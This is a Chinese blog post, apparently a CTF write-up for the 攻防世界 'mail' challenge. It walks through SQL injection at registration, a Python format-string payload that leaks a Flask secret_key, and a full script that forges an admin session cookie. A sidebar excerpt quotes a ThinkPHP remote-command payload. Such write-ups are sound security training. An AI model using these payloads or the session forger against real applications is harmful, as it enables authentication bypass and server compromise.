攻防世界--mail

最新推荐文章于 2025-02-10 18:56:00 发布
最新推荐文章于 2025-02-10 18:56:00 发布
阅读量3k 收藏 4
点赞数 1
文章标签: ctf
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_46263951/article/details/122602777
版权

尝试登陆admin给出提示可知存在admin账号

尝试注入显示只能是数字和字母,先注册进去,给出提示

 通过扫描目录可以发现/flag目录

查看session

要更改session就需要secret_key 

经测试,发现在注册时邮箱位置存在sql注入(添加单撇号报错)

使用布尔盲注脚本,发现admin的密码为h4ck4fun

登陆后页面

可以发现session和/flag要求的session还是不一样

admin用户这里多出一个修改邮箱功能,这里存在format格式化字符串漏洞

{user.__class__.__init__.__globals__}

使用current_app

{user.__class__.__init__.__globals__[current_app].config}

 找到secret_key后对session进行伪造

利用脚本

from flask.sessions import SecureCookieSessionInterface
import traceback
import ast

class MockApp(object):
    def __init__(self, secret_key):
        self.secret_key = secret_key

def encode(secret_key, session_cookie_structure):
    try:
        app = MockApp(secret_key)
        session_cookie_structure = dict(ast.literal_eval(session_cookie_structure))
        si = SecureCookieSessionInterface()
        s = si.get_signing_serializer(app)
        return s.dumps(session_cookie_structure)
    except Exception as e:
        traceback.print_exc()
        return False

if __name__ == "__main__":
    payload = "{'isadmin': 1, 'user': (1, 'admin', 'admin@qq.com')}"
    key = '873351ddf667ee973039b51b17dd399f'
    print(encode(key, payload))

访问/flag,更改session即可

Uzero.
关注
攻防世界 web高手进阶区 10分题 email
闵行小鱼塘
11-16 2249
继续ctf的旅程,攻防世界web高手进阶区的10分题,本文是email的writeup
[攻防世界]srm-50
逆向萌新的博客
06-10 243
[攻防世界]srm-50
攻防世界----unfinish
qq_44418229的博客
08-02 806
攻防世界--unfinish SQL的二次注入
攻防世界(web高手进阶区)——21~31题
weixin_43610673的博客
04-11 3225
FlatScience 点开的页面中的链接都是下载pdf文件的,都是英文论文什么的,先不管 测试/.git/,回显404,但有robots.txt 两个登录界面,猜测flag应该是登录admin.php拿到,通过对login.php进行注入得到密码。 login.php源码注释有提示 访问/login.php?debug,得到源码 是个sqlite的数据库,密码通过sha1加密还加了sa...
攻防世界-web题型-9星难度汇总-个人wp
DamnVanish的博客
08-24 1208
攻防世界web题型9星难度
攻防世界-进阶srm-50
qq_43447375的博客
12-26 235
攻防世界-进阶srm-50 题目:srm-50 题目来源:攻防世界 题目描述:暂无 一、查壳 拖进PEID中发现无壳,是一个Win32 GUI程序 二、运行程序 运行程序发现会弹出一个窗口要求输入E-Mail地址和Serial 三、拖进IDA中反汇编 将题目拖入IDA中找到MFC主函数WinMain发现对话框主程序就是DialogFunc。 DialogFunc函数伪代码: 1.发现判断E-Mail地址的合法性只是看看它是不是@X.X格式。 2.对输入的Serial进行依次比较。seria
攻防世界33 catcat-new【文件包含/flask_session伪造】
最新发布
2401_86190146的博客
02-10 1140
1.:是一个文本文件,存储了系统中所有用户的基本信息,任何用户都可以读取该文件,但只有超级用户(root)可以修改它,该文件的存在有助于系统识别和管理用户账户。文件中的每一行代表一个用户账户,每行由冒号分隔成 7 个字段,基本格式:用户名:口令(密码):用户标识号(UID):组标识号(GID):注释性描述(相当于备注):用户主目录(用户登录系统后默认进入的目录):登录Shell(用户登录系统后默认使用的shell程序)2./proc/self。
[CTF] 攻防世界MISC高手区部分题目WriteUp
qq_37969220的博客
11-26 3864
记录一些有意思的题目 目录索引双色块flag_universe3-11互相伤害!!!Miscellaneous-300intoUJust-No-OneDiskpicture2MulTzor未完待续... 双色块 下载附件解压出来是个gif文件,仔细观察一下,发现两种色块应该分别代表01。写段Python脚本把数据提取出来 from PIL import Image # 读取图片 image = Image.open('C:\\Users\\28919\\Desktop\\out.gif') # 存放分离出的
攻防世界blgdel
qq_43774856的博客
12-07 428
攻防世界blgdel 打开链接,如图所示 先注册一个账号 并没有发现什么可以利用的点,只能用dirsearch扫一扫了 发现了robots.txt,config.txt,sql.txt,upload.php robots.txt config.txt <?php class master { private $path; private $name; function __construct() { } function stream_open($path) {
攻防世界reverse进阶区1分题总结_逆向之旅013
weixin_43281394的博客
03-06 638
题目:Reversing-x64Elf-100;answer_to_everything;tt3441810; lgniteMe;srm-50)
记一次高校豌豆杯——Misc(后续题目持续更新)
jiuyongpinyin的博客
11-27 919
大白 题目直接修改图片的长度就可以了,这个没什么难度 修改完后的数据 查看图片得到flag 图片隐藏信息 依然属于送分题,使用010查看图片就可以得到flag,不过一开始没觉得那个是flag,后来才发现这次比赛的flag没啥规律可言,啥都有可能是flag,没有固定的格式 文件类型分析 下载文件,放到010里面分析一波 先贴出两个常见的压缩包文件头 ZIP Archive (zip),文件头(hex):504B0304 RAR Archive (rar),文件头(hex):52617221 发现这
【愚公系列】2023年06月 网络安全(交通银行杯)-神秘的mail
时光隧道
05-28 9749
pcapng是一种网络抓包文件格式,它是Packet Capture Next Generation的缩写。与pcap文件格式相比,pcapng具有更好的灵活性和可扩展性,它支持多种数据块类型和多种数据流的捕获,同时也支持更多的元数据信息。pcapng格式的文件可以在多种网络工具和分析器之间进行共享和交换。SMTP(Simple Mail Transfer Protocol)是用于电子邮件传输的协议,它定义了电子邮件从发送客户端到接收客户端的传输方式。
攻防世界Mary_Morton
像初雪一样自由洒落
02-16 964
64位程序,开启了canary和nx保护 执行以下,效果如下: 有提示: 输入1那块存在栈溢出 输入2那块存在格式化字符串漏洞 拖到ida看一下 main函数: 栈溢出的函数: 有canary保护,根据程序可以看出,v2应该就是canary的值,一开始,将_readfsqword(0x28u)的值给v2,后来又和v2做异或操作,只有v2与它还相等,...
攻防世界(web高手进阶区)——32~44题
weixin_43610673的博客
08-04 2872
题号会变动可能不太一样 目录Web_php_wrong_nginx_configCommentZhuanxvWeb_python_block_chainics-02love_mathWeb_python_flask_sql_injection/register路由/edit_profile路由FilemanagerBilibiliSmartyTriangleTimeKeepereasylaravel Web_php_wrong_nginx_config 直接尝试登录,另修改isLogin=1 无效 有r
攻防世界 WEB Web_python_flask_sql_injection
qq_41696858的博客
12-13 1143
没啥好说的,题目已经把几个关键点给出来了,flask,sql注入,还给了源码 那么就是源码审计,这题sql注入的点属实是有点多,普通的也有,难的也有,也难怪他是个九分题 干就完了,下载源码,第一个注入点是routes.py里面的index路由项 res = mysql.Add("post", ['NULL', "'%s'" % form.post.data, "'%s'" % current_user.id, "'%s'" % now()])
攻防世界web
热门推荐
kid的博客
05-23 2万+
攻防世界web 前言 准备ctf比赛,这里把攻防世界分值低于5分的基本刷了一遍(分值再高刷不动了…) 练习 view_source 没难度知识禁用了右键点击,ctrl+u查看源码拿到flag get_post 这题没什么好说的,按着提示来就能拿flag 但我发现下面的hackbar不能用后用burp来进行post传参不返回flag…迷了我很久… 结果我下了左边那个hackbar后重来一...
攻防世界(web高手进阶区)——1~20题
weixin_43610673的博客
03-29 6900
baby_web Training-WWW-Robots php_rce ?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=php%20-r%20%27system("cat%20../../../flag");%27...
攻防世界-web-unfinish-从0到1的解题历程writeup
CTF小白的博客
04-18 5625
题目分析 题目描述为:SQL 题目主要功能界面分析: 主要分为注册、登陆、以及成功登陆后的一个界面。 通过描述可以知道题目应该存在SQL注入漏洞。 扫描得知注册界面存在SQL注入漏洞 尝试构造sql盲注语句如下 {‘username’: “1’ and ELT(left((SELECT schema_name FROM information_schema.schemata limit 0,1)...
攻防世界-- web高手进阶区-- writeup汇总
yisosooo的博客
09-22 6374
随做随记,争取记录详细思路,以供后续反思。 第一题-- cat 按照提示输入loli.club,没有任何回显。输入baidu.com也没有任何回显。再次尝试输入127.0.0.1,出现: 可知,submit其实是ping命令,而且好像只对ip地址起作用。尝试运行系统命令: 失败。输入127.0.0.1 | ls 同样失败。但是发现URL编码可以传入。当输入到%80时,出现报错信息,...
上海交大网络安全实验指南:实操攻防与技巧解析
上海交通大学的网络攻防实验指导书是一份精心设计的学习工具,旨在帮助学生深入理解和实践网络安全领域的知识。...通过一系列任务的完成,学生能够深入理解网络攻防策略,提高他们在现实世界中的网络安全技能。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值